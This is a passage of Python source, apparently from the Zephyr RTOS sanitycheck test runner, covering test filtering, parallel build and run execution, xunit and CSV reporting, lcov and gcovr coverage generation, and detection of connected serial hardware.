"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_passed,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases - self.total_skipped_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run - self.total_skipped}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.connected_hardware:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if sanitycheck was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda inst: inst.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda inst: inst.platform.default, instance_list))
self.add_instances(instances)
for instance in list(filter(lambda inst: not inst.platform.default, instance_list)):
discards[instance] = discards.get(instance, "Not a default test platform")
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
instance.status = "skipped"
instance.fill_results_by_status()
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped', 'error']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
logger.info("Adding tasks to the queue...")
# We can use a with statement to ensure threads are cleaned up promptly
with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:
# start a future for a thread which sends work in through the queue
future_to_test = {
executor.submit(self.add_tasks_to_queue, self.build_only, self.test_only): 'FEEDER DONE'}
while future_to_test:
# check for status of the futures which are currently working
done, pending = concurrent.futures.wait(future_to_test, timeout=1,
return_when=concurrent.futures.FIRST_COMPLETED)
# if there is incoming work, start a new future
while not pipeline.empty():
# fetch a url from the queue
message = pipeline.get()
test = message['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors
)
future_to_test[executor.submit(pb.process, message)] = test.name
# process any completed futures
for future in done:
test = future_to_test[future]
try:
data = future.result()
except Exception as exc:
logger.error('%r generated an exception:' % (test,))
for line in traceback.format_exc().splitlines():
logger.error(line)
sys.exit('%r generated an exception: %s' % (test, exc))
else:
if data:
logger.debug(data)
# remove the now completed future
del future_to_test[future]
for future in pending:
test = future_to_test[future]
try:
future.result(timeout=180)
except concurrent.futures.TimeoutError:
logger.warning("{} stuck?".format(test))
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if not self.discards:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True, append=append)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False):
total = 0
if platform:
selected = [platform]
else:
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP':
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
logger.error(f"Unknown status {instance.status}")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' \
or (not instance.run and instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
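# retrieve_gcov_data() below parses handler logs that contain a coverage dump
# framed by GCOV_COVERAGE_DUMP_START / GCOV_COVERAGE_DUMP_END lines. Each
# payload line has the shape "*FILENAME<HEXDUMP": a leading "*", the gcda
# file name, a "<" separator, then the hex-encoded file contents.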
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# gcovr fails if kobject_hash is included in the coverage data, so skip
# it here (this is only a problem with gcovr v4.1)
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, values):
tuple_list = [(prefix, item) for item in values]
return [item for sublist in tuple_list for item in sublist]
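# e.g. _interleave_list("-e", ["foo", "bar"]) -> ["-e", "foo", "-e", "bar"],
# which is the argv shape gcovr expects for repeated options.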
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
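# scan_hw() first matches a detected product string exactly against these
# lists, then falls back to treating each entry as a regular expression.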
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform, pre_script, is_pty):
device = {
"serial": None,
"platform": platform,
"serial_pty": None,
"counter": 0,
"available": True,
"connected": True,
"pre_script": pre_script
}
if is_pty:
device['serial_pty'] = serial
else:
device['serial'] = serial
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, products in self.runner_mapping.items():
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
self.detected.sort(key=lambda x: x['serial'] or '')
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product'] and not h['connected'] and not d.get('match', False):
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
